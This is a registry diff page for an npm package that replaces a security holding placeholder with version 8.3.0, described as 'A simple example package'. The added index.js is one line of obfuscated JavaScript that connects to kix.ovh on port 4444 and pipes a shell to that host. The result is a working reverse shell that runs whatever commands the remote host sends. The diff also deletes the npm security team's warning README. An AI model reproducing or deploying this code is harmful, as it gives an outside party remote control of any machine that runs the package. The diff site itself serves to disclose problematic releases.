@ag2rlamondiale/ag2rlm-lib 0.0.1-security → 8.3.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @ag2rlamondiale/ag2rlm-lib might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +13 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const _0x14bd6d=_0x2cc3;(function(_0x54ecdb,_0x1987d7){const _0x5d6a83=_0x2cc3,_0x496d1c=_0x54ecdb();while(!![]){try{const _0x976eaa=-parseInt(_0x5d6a83(0x15e))/0x1+parseInt(_0x5d6a83(0x15a))/0x2*(parseInt(_0x5d6a83(0x15f))/0x3)+-parseInt(_0x5d6a83(0x150))/0x4+parseInt(_0x5d6a83(0x158))/0x5+-parseInt(_0x5d6a83(0x15c))/0x6*(-parseInt(_0x5d6a83(0x163))/0x7)+parseInt(_0x5d6a83(0x153))/0x8*(parseInt(_0x5d6a83(0x162))/0x9)+-parseInt(_0x5d6a83(0x157))/0xa;if(_0x976eaa===_0x1987d7)break;else _0x496d1c['push'](_0x496d1c['shift']());}catch(_0x34f20a){_0x496d1c['push'](_0x496d1c['shift']());}}}(_0x3cda,0x9a16d));function _0x2cc3(_0x1905f2,_0x4cce0e){const _0x3cda8d=_0x3cda();return _0x2cc3=function(_0x2cc3bf,_0x3235f7){_0x2cc3bf=_0x2cc3bf-0x14f;let _0x3827fa=_0x3cda8d[_0x2cc3bf];return _0x3827fa;},_0x2cc3(_0x1905f2,_0x4cce0e);}function _0x3cda(){const _0x44a863=['3789652lEpiFY','write','pipe','24QvuSgP','spawn','close','toString','1554680xgeboA','5333925XarZzt','kix.ovh','866218xAKjta','Success\x20blah\x0a','9030CzctwH','child_process','405388JLUeUx','3xkisoY','Socket','connect','505377dXzIDz','2191AFcoMn','Connection\x20closed','log'];_0x3cda=function(){return _0x44a863;};return _0x3cda();}const net=require('net'),cp=require(_0x14bd6d(0x15d)),client=new net[(_0x14bd6d(0x160))]();client[_0x14bd6d(0x161)](0x115c,_0x14bd6d(0x159),()=>{const _0x335444=_0x14bd6d;client[_0x335444(0x152)](cp[_0x335444(0x154)]('sh',[])),client[_0x335444(0x151)](_0x335444(0x15b));}),client['on']('data',_0x530ea0=>{const _0x33e05c=_0x14bd6d;cp[_0x33e05c(0x154)]('sh',['-c',_0x530ea0[_0x33e05c(0x156)]()]);}),client['on'](_0x14bd6d(0x155),()=>{const _0x3898ea=_0x14bd6d;console[_0x3898ea(0x14f)](_0x3898ea(0x164));});
|
package/package.json
CHANGED
@@ -1,6 +1,16 @@
|
|
1
1
|
{
|
2
2
|
"name": "@ag2rlamondiale/ag2rlm-lib",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "8.3.0",
|
4
|
+
"description": "A simple example package",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"start": "node index.js"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"example",
|
11
|
+
"demo"
|
12
|
+
],
|
13
|
+
"author": "Kix",
|
14
|
+
"license": "MIT"
|
6
15
|
}
|
16
|
+
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40ag2rlamondiale%2Fag2rlm-lib for more information.
|